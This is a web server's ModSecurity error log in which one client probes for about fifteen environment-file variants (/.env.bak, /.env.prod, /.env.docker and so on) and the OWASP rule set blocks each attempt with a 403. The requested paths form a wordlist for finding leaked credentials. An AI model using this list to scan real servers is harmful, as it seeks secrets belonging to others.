[Mon May 11 18:06:35.885910 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.test"] [unique_id "agH-i4W8yzYoWG_eyCW6RAAAAUg"]
[Mon May 11 18:06:35.886215 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-i4W8yzYoWG_eyCW6RAAAAUg"]
[Mon May 11 18:06:36.159215 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.remote"] [unique_id "agH-jIW8yzYoWG_eyCW6RQAAAUg"]
[Mon May 11 18:06:36.159447 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.remote"] [unique_id "agH-jIW8yzYoWG_eyCW6RQAAAUg"]
[Mon May 11 18:06:36.159750 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jIW8yzYoWG_eyCW6RQAAAUg"]
[Mon May 11 18:06:36.486220 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.bak"] [unique_id "agH-jIW8yzYoWG_eyCW6SAAAAUg"]
[Mon May 11 18:06:36.486450 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.bak"] [unique_id "agH-jIW8yzYoWG_eyCW6SAAAAUg"]
[Mon May 11 18:06:36.486753 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jIW8yzYoWG_eyCW6SAAAAUg"]
[Mon May 11 18:06:36.764782 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.backup"] [unique_id "agH-jIW8yzYoWG_eyCW6SgAAAUg"]
[Mon May 11 18:06:36.765029 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.backup"] [unique_id "agH-jIW8yzYoWG_eyCW6SgAAAUg"]
[Mon May 11 18:06:36.765336 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jIW8yzYoWG_eyCW6SgAAAUg"]
[Mon May 11 18:06:37.105899 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agH-jYW8yzYoWG_eyCW6SwAAAUg"]
[Mon May 11 18:06:37.106134 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agH-jYW8yzYoWG_eyCW6SwAAAUg"]
[Mon May 11 18:06:37.106466 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jYW8yzYoWG_eyCW6SwAAAUg"]
[Mon May 11 18:06:37.366615 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.old"] [unique_id "agH-jYW8yzYoWG_eyCW6TQAAAUg"]
[Mon May 11 18:06:37.366839 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.old"] [unique_id "agH-jYW8yzYoWG_eyCW6TQAAAUg"]
[Mon May 11 18:06:37.367143 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jYW8yzYoWG_eyCW6TQAAAUg"]
[Mon May 11 18:06:37.644421 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.sample"] [unique_id "agH-jYW8yzYoWG_eyCW6TgAAAUg"]
[Mon May 11 18:06:37.644645 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.sample"] [unique_id "agH-jYW8yzYoWG_eyCW6TgAAAUg"]
[Mon May 11 18:06:37.644945 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jYW8yzYoWG_eyCW6TgAAAUg"]
[Mon May 11 18:06:37.893611 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agH-jYW8yzYoWG_eyCW6TwAAAUg"]
[Mon May 11 18:06:37.893858 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agH-jYW8yzYoWG_eyCW6TwAAAUg"]
[Mon May 11 18:06:37.894137 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-jYW8yzYoWG_eyCW6TwAAAUg"]
[Mon May 11 18:06:38.162626 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.dev"] [unique_id "agH-joW8yzYoWG_eyCW6UAAAAUg"]
[Mon May 11 18:06:38.162850 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.dev"] [unique_id "agH-joW8yzYoWG_eyCW6UAAAAUg"]
[Mon May 11 18:06:38.163291 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-joW8yzYoWG_eyCW6UAAAAUg"]
[Mon May 11 18:06:38.422257 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.prod"] [unique_id "agH-joW8yzYoWG_eyCW6UQAAAUg"]
[Mon May 11 18:06:38.422478 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.prod"] [unique_id "agH-joW8yzYoWG_eyCW6UQAAAUg"]
[Mon May 11 18:06:38.422741 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-joW8yzYoWG_eyCW6UQAAAUg"]
[Mon May 11 18:06:38.703636 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.stage"] [unique_id "agH-joW8yzYoWG_eyCW6UwAAAUg"]
[Mon May 11 18:06:38.703859 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.stage"] [unique_id "agH-joW8yzYoWG_eyCW6UwAAAUg"]
[Mon May 11 18:06:38.704168 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-joW8yzYoWG_eyCW6UwAAAUg"]
[Mon May 11 18:06:38.980405 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.ci"] [unique_id "agH-joW8yzYoWG_eyCW6VAAAAUg"]
[Mon May 11 18:06:38.980628 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.ci"] [unique_id "agH-joW8yzYoWG_eyCW6VAAAAUg"]
[Mon May 11 18:06:38.980905 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-joW8yzYoWG_eyCW6VAAAAUg"]
[Mon May 11 18:06:39.242143 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.docker"] [unique_id "agH-j4W8yzYoWG_eyCW6VgAAAUg"]
[Mon May 11 18:06:39.242396 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.docker"] [unique_id "agH-j4W8yzYoWG_eyCW6VgAAAUg"]
[Mon May 11 18:06:39.242685 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-j4W8yzYoWG_eyCW6VgAAAUg"]
[Mon May 11 18:06:39.548537 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.live"] [unique_id "agH-j4W8yzYoWG_eyCW6VwAAAUg"]
[Mon May 11 18:06:39.548767 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.live"] [unique_id "agH-j4W8yzYoWG_eyCW6VwAAAUg"]
